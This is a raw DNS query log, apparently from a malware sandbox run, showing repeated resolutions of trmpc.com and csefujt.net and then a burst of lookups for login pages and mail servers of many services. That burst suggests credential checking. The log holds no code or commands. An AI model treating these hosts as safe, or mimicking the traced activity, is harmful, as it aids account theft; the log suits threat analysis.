                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117784023 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117784023 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com151.233.51.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117784023 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com93.112.195.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117784023 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com185.12.79.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117784023 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com138.36.3.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117784023 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117784023 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117784023 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117818117 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117818117 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117818117 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117818117 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com151.233.51.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117818117 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com93.112.195.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117818117 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com185.12.79.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117818117 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com138.36.3.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117818117 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117818117 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117818117 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117850065 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com2.180.10.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117850065 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com123.140.161.243A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117850065 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com211.119.84.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117850065 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com151.233.51.166A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117850065 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com93.112.195.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117850065 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com185.12.79.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117850065 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com138.36.3.134A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117850065 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com190.12.87.61A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117850065 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com186.147.159.149A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:41.117850065 CET1.1.1.1192.168.2.60xf5a6No error (0)trmpc.com196.188.169.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:31.049228907 CET152.89.198.214192.168.2.60x144No error (0)csefujt.net185.196.8.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.153426886 CET1.1.1.1192.168.2.60xa3f2No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.153450966 CET1.1.1.1192.168.2.60x23eeNo error (0)steamcommunity.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.153450966 CET1.1.1.1192.168.2.60x23eeNo error (0)steamcommunity.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.167282104 CET1.1.1.1192.168.2.60xaf11No error (0)milogin.michigan.govmilogin.michigan.gov.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.179991007 CET1.1.1.1192.168.2.60x4c08No error (0)multiideas.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.203934908 CET1.1.1.1192.168.2.60x663cNo error (0)warriorplus.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.203934908 CET1.1.1.1192.168.2.60x663cNo error (0)warriorplus.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.203934908 CET1.1.1.1192.168.2.60x663cNo error (0)warriorplus.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.203934908 CET1.1.1.1192.168.2.60x663cNo error (0)warriorplus.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.203934908 CET1.1.1.1192.168.2.60x663cNo error (0)warriorplus.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.211127996 CET1.1.1.1192.168.2.60x1bfNo error (0)web.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.215284109 CET1.1.1.1192.168.2.60xd9b1No error (0)netizion.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.220570087 CET1.1.1.1192.168.2.60x93ffNo error (0)signup2.br.leagueoflegends.comsignup2.br.leagueoflegends.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.228513002 CET1.1.1.1192.168.2.60x2931No error (0)authenticate.riotgames.comauthenticate.riotgames.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.231870890 CET1.1.1.1192.168.2.60x9aeNo error (0)analvids.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.231870890 CET1.1.1.1192.168.2.60x9aeNo error (0)analvids.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.233191013 CET1.1.1.1192.168.2.60x6f7fNo error (0)accounts.google.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.233191013 CET1.1.1.1192.168.2.60x6f7fNo error (0)accounts.google.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.233191013 CET1.1.1.1192.168.2.60x6f7fNo error (0)accounts.google.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.233191013 CET1.1.1.1192.168.2.60x6f7fNo error (0)accounts.google.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.233191013 CET1.1.1.1192.168.2.60x6f7fNo error (0)accounts.google.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.251804113 CET1.1.1.1192.168.2.60xb9f0No error (0)gitam.zoom.uswww.zoom.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.251804113 CET1.1.1.1192.168.2.60xb9f0No error (0)www.zoom.uszoom.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.251804113 CET1.1.1.1192.168.2.60xb9f0No error (0)zoom.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.251804113 CET1.1.1.1192.168.2.60xb9f0No error (0)zoom.usMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.265002966 CET1.1.1.1192.168.2.60xca1aNo error (0)account.live.comaccount.msa.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.276609898 CET1.1.1.1192.168.2.60xd71eNo error (0)lookaside.fbsbx.comscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.278448105 CET1.1.1.1192.168.2.60x5ef2No error (0)tiktok.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.278448105 CET1.1.1.1192.168.2.60x5ef2No error (0)tiktok.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.278448105 CET1.1.1.1192.168.2.60x5ef2No error (0)tiktok.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.279723883 CET1.1.1.1192.168.2.60x9917Name error (3)mobile.liga365gacor.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.289933920 CET1.1.1.1192.168.2.60xe5f4Name error (3)app.jobpet.com.brnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.293723106 CET1.1.1.1192.168.2.60x5018Server failure (2)signup.takendelight.comnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.293760061 CET1.1.1.1192.168.2.60x3ba1No error (0)genshin.mihoyo.comgenshin.mihoyo.com.w.kunlunsl.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.306848049 CET1.1.1.1192.168.2.60xffccNo error (0)api.cmrsanmartin.ziz.clcmrsanmartin.ziz.clCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.317842007 CET1.1.1.1192.168.2.60xdfeeNo error (0)naukrigulf.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.327487946 CET1.1.1.1192.168.2.60x4de6No error (0)foros.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.363962889 CET1.1.1.1192.168.2.60x2b48No error (0)iam.gov.saMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.363962889 CET1.1.1.1192.168.2.60x2b48No error (0)iam.gov.saMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.373924971 CET1.1.1.1192.168.2.60xe5a6Name error (3)sii.itzacatepec.edu.mxnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.392692089 CET1.1.1.1192.168.2.60x84dcNo error (0)pan.baidu.comyiyun.n.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.402916908 CET1.1.1.1192.168.2.60xfde8No error (0)uh.isMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.432302952 CET1.1.1.1192.168.2.60xeba4No error (0)rage.mpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.443363905 CET1.1.1.1192.168.2.60xe1d8Name error (3)auth.cambridgelms.orgnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.460764885 CET1.1.1.1192.168.2.60x2b10No error (0)chainmine.ioMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.461250067 CET1.1.1.1192.168.2.60x8df0No error (0)casinocontroller.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.461250067 CET1.1.1.1192.168.2.60x8df0No error (0)casinocontroller.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.461807013 CET1.1.1.1192.168.2.60x58e2No error (0)ucv.blackboard.comlearn-prod-5ea8899e63bc1-2104512027.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.504791975 CET1.1.1.1192.168.2.60xedaNo error (0)auth.riotgames.comauth.riotgames.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.509851933 CET1.1.1.1192.168.2.60x17b4No error (0)cjdropshipping.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.519005060 CET1.1.1.1192.168.2.60x3291No error (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.519005060 CET1.1.1.1192.168.2.60x3291No error (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.519005060 CET1.1.1.1192.168.2.60x3291No error (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.519005060 CET1.1.1.1192.168.2.60x3291No error (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.519005060 CET1.1.1.1192.168.2.60x3291No error (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.519005060 CET1.1.1.1192.168.2.60x3291No error (0)instructory.netMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.520104885 CET1.1.1.1192.168.2.60x70abNo error (0)pl-pl.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.520104885 CET1.1.1.1192.168.2.60x70abNo error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.533665895 CET1.1.1.1192.168.2.60x4bf7No error (0)discord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.533665895 CET1.1.1.1192.168.2.60x4bf7No error (0)discord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.533665895 CET1.1.1.1192.168.2.60x4bf7No error (0)discord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.533665895 CET1.1.1.1192.168.2.60x4bf7No error (0)discord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.533665895 CET1.1.1.1192.168.2.60x4bf7No error (0)discord.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.534481049 CET1.1.1.1192.168.2.60xdd03No error (0)nuevopacto.runacode.com172.66.43.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.534481049 CET1.1.1.1192.168.2.60xdd03No error (0)nuevopacto.runacode.com172.66.40.192A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.534872055 CET1.1.1.1192.168.2.60x5d65No error (0)account.booking.comdu1b3vb35hc0o.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.536202908 CET1.1.1.1192.168.2.60xe5daNo error (0)accounts.snapchat.comweb-gcp.api.snapchat.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.536202908 CET1.1.1.1192.168.2.60xe5daNo error (0)web-gcp.api.snapchat.comweb-gcp.api.sc-gw.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.546478987 CET1.1.1.1192.168.2.60xdaf3Name error (3)vidcorn.tvnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.547492027 CET1.1.1.1192.168.2.60x3618Name error (3)tls21.netnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.547949076 CET1.1.1.1192.168.2.60x3731No error (0)pt.secure.imvu.comsecure.imvu.sl.smartling.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.550235987 CET1.1.1.1192.168.2.60xb310No error (0)milogin.michigan.govmilogin.michigan.gov.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.553216934 CET1.1.1.1192.168.2.60xb94bNo error (0)accounts.binance.comd2dbdn71e1vorj.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.556843996 CET1.1.1.1192.168.2.60x5f5eNo error (0)poligrafosecuador.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.556843996 CET1.1.1.1192.168.2.60x5f5eNo error (0)poligrafosecuador.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.560637951 CET1.1.1.1192.168.2.60x2747No error (0)nossoplayer.meMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.561991930 CET1.1.1.1192.168.2.60x4355No error (0)kwyk.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.561991930 CET1.1.1.1192.168.2.60x4355No error (0)kwyk.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.561991930 CET1.1.1.1192.168.2.60x4355No error (0)kwyk.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.561991930 CET1.1.1.1192.168.2.60x4355No error (0)kwyk.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.561991930 CET1.1.1.1192.168.2.60x4355No error (0)kwyk.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.561991930 CET1.1.1.1192.168.2.60x4355No error (0)kwyk.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.561991930 CET1.1.1.1192.168.2.60x4355No error (0)kwyk.frMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.569988012 CET1.1.1.1192.168.2.60x65f3No error (0)21dukes.comMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.589998007 CET1.1.1.1192.168.2.60x2d12No error (0)zarkana2.roMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.607011080 CET1.1.1.1192.168.2.60x8e1fNo error (0)sistemas.pa.gov.brMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.617592096 CET1.1.1.1192.168.2.60xccd7No error (0)es-la.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.617592096 CET1.1.1.1192.168.2.60xccd7No error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.621400118 CET1.1.1.1192.168.2.60x204cNo error (0)zuhauseplus.vodafone.deqcolamq.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.634207964 CET1.1.1.1192.168.2.60x8214No error (0)accounts.ecitizen.go.keaccounts.ecitizen.go.ke.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.643160105 CET1.1.1.1192.168.2.60x4d06No error (0)ssc.nic.inMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.688082933 CET1.1.1.1192.168.2.60xc68bNo error (0)servicossociais.caixa.gov.brservicossociais.caixa.gov.br.map.azionedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.688082933 CET1.1.1.1192.168.2.60xc68bNo error (0)servicossociais.caixa.gov.br.map.azionedge.net179.191.175.66A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.688082933 CET1.1.1.1192.168.2.60xc68bNo error (0)servicossociais.caixa.gov.br.map.azionedge.net179.191.175.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.688082933 CET1.1.1.1192.168.2.60xc68bNo error (0)servicossociais.caixa.gov.br.map.azionedge.net89.30.68.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.688082933 CET1.1.1.1192.168.2.60xc68bNo error (0)servicossociais.caixa.gov.br.map.azionedge.net179.191.175.69A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.752474070 CET1.1.1.1192.168.2.60x4cfcNo error (0)yellosa.co.zaMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.760962963 CET1.1.1.1192.168.2.60x27fdNo error (0)hi-in.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.760962963 CET1.1.1.1192.168.2.60x27fdNo error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.778270960 CET1.1.1.1192.168.2.60x9d35No error (0)followerstiktok.xyzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.845961094 CET1.1.1.1192.168.2.60x9d35No error (0)followerstiktok.xyzMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.878964901 CET1.1.1.1192.168.2.60x27fdNo error (0)hi-in.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.878964901 CET1.1.1.1192.168.2.60x27fdNo error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.880989075 CET1.1.1.1192.168.2.60xcb6bNo error (0)th-th.facebook.comstar.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.880989075 CET1.1.1.1192.168.2.60xcb6bNo error (0)star.facebook.comstar.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:48.909512043 CET1.1.1.1192.168.2.60xa10fNo error (0)m.codere.com.co5s5tsl3.impervadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.063309908 CET1.1.1.1192.168.2.60xa1b1No error (0)lookaside.fbsbx.comscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.063309908 CET1.1.1.1192.168.2.60xa1b1No error (0)scontent.xx.fbcdn.net31.13.65.7A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.064843893 CET1.1.1.1192.168.2.60x6c55No error (0)us04web.zoom.us170.114.52.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.079355001 CET1.1.1.1192.168.2.60x84aaServer failure (2)brasilliker.netnonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.080995083 CET1.1.1.1192.168.2.60x3ffNo error (0)multiideas.com192.185.5.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.087111950 CET1.1.1.1192.168.2.60x9919No error (0)opsu.terna.net104.21.5.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.087111950 CET1.1.1.1192.168.2.60x9919No error (0)opsu.terna.net172.67.132.197A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.174731016 CET1.1.1.1192.168.2.60x2c0No error (0)innovationdevelopment.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.174755096 CET1.1.1.1192.168.2.60x2c0No error (0)innovationdevelopment.euMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.192337036 CET1.1.1.1192.168.2.60xfbeNo error (0)store.steampowered.com184.25.164.103A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.229171038 CET1.1.1.1192.168.2.60x6053Name error (3)netcsomagom.dpd.hunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.285579920 CET1.1.1.1192.168.2.60x96a5No error (0)0260049m.index-education.net46.33.178.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:49.317708015 CET1.1.1.1192.168.2.60x1b9bNo error (0)accounts.faceit.com104.17.62.50A (IP address)IN (0x0001)false
